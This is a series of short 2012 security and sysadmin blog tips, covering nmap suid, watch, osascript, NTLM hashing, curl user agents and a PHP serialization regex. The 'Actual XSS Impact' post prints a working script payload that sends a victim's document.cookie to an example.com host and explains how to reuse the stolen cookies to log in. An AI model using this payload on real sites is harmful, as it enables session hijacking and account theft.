Tuesday, October 23, 2012

Nmap & suid

If you come across a machine or web app that has nmap with the suid bit set, then the following article will be of interest to you:

http://synfin.net/papers/nmap-suid.txt


Friday, October 19, 2012

Mount NTFS ISOs in linux

http://wiki.edseek.com/guide:mount_loopback#accessing_specific_partitions_in_the_image

watch ALL the things

So i'm waiting for a drive to clone and i like to see both the byte size AND the human readable byte size. I know you watch repeating command using "watch" dur...but two commands at once?

Its actually much simpler than it sounds. All watch does is pass the arguments to 'sh -c'. So, it follows that the following line must work:

watch ls -l file \; ls -lh file

and yes, it does. All you need to do is escape the command terminator ';' so it will be passed as an argument.

now to watch paint dry...

Wednesday, October 17, 2012

OSX Alert Boxes

Found this on a stackoverflow post, apparently running the following line pops up a box with the specified text:
osascript -e 'tell app "System Events" to display dialog "ZOMGLULZ"'

Monday, October 8, 2012

Actual XSS Impact

Popping up alert boxes as a PoC for XSS is cute and all, but sometimes you want to see the actual attack. The following javascript line will make a GET request to example.com/wut.gif and append the document.cookie to the request. You then log into that server, read your apache logs, and you have the cookies for that user. Replace your browser's cookies with the captured ones and, depending on the site, you could log in as them.
<script>a = new Image(); a.src = "http://example.com/wut.gif?" + document.cookie + "end"; </script>
This is an actual attackers line, dont be stupid.

Generate NTLM hashes via command line

Turns out the NTLM hashing algo is super simple. It just takes the string you give it, converts it to UTF-16LE and then outputs the md4 of that. You can generate your own fairly simply at the command line:

iconv -f ASCII -t UTF-16LE <(printf "lolwut") | openssl dgst -md4
What this does is use a fairly popular unix utility "iconv". -f is the "from" encoding, which is this case is just simple ASCII and sets to "to" encoding using -t. It reads in the string using printf and pipes that to openssl for the digest. the result is the NT hash of the string (or password if you want to look at it like that) "lolwut"

$iconv -f ASCII -t UTF-16LE <(printf "lolwut") | openssl dgst -md4
dcc1ed89d1d080ef47dccf3e59a50d45
create a function and place it in .bashrc:
ntlm_hash () {
iconv -f ASCII -t UTF-16LE <(printf "$1") | openssl dgst -md4
}
now just type "ntlm_hash lolwut" to get the same result.

Stealth cURL

I use curl all the time, almost every day. Unfortunately curl thinks its a good idea to use their own user agent string when grabbing content from sites. This has the problem because sometimes devs code in exceptions for different browsers, so the page you get back for internet explorer is different than the one you get for firefox. Luckily, the curl devs included the ability to change your user agent string to whatever you want.

normally curl's agent string is this: (curl from my macbook)
User-Agent: curl/7.24.0 (x86_64-apple-darwin12.0) libcurl/7.24.0 OpenSSL/0.9.8r zlib/1.2.5

That is grabbed directly from the header that is sent to the server (captured using netcat). As you can see its fairly obvious that the person is on mac and they are using curl. To change this user agent agent so it appears as if firefox is grabbing it, we use the -A option. First we grab the valid user agent string we decide to use from http://www.useragentstring.com/. In this case i'm going to use the latest firefox one, the command line is as follows:

curl -A 'Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2' example.com
Now if you look at your logs, you will see the user-agent string will reflect the new string.

Note:
curl supports config files using -K, so you can just place it in a file along with whatever else you want to use and reference the config files, a nice example is in the man page.

Wednesday, October 3, 2012

Regex for PHP serialized data

This is the regex string to use when searching through a document for serialized data.

/^(i|s|a|o|d)(.*);/si

I got it from here: http://regex-test.com/library/entry/check_if_serialized/16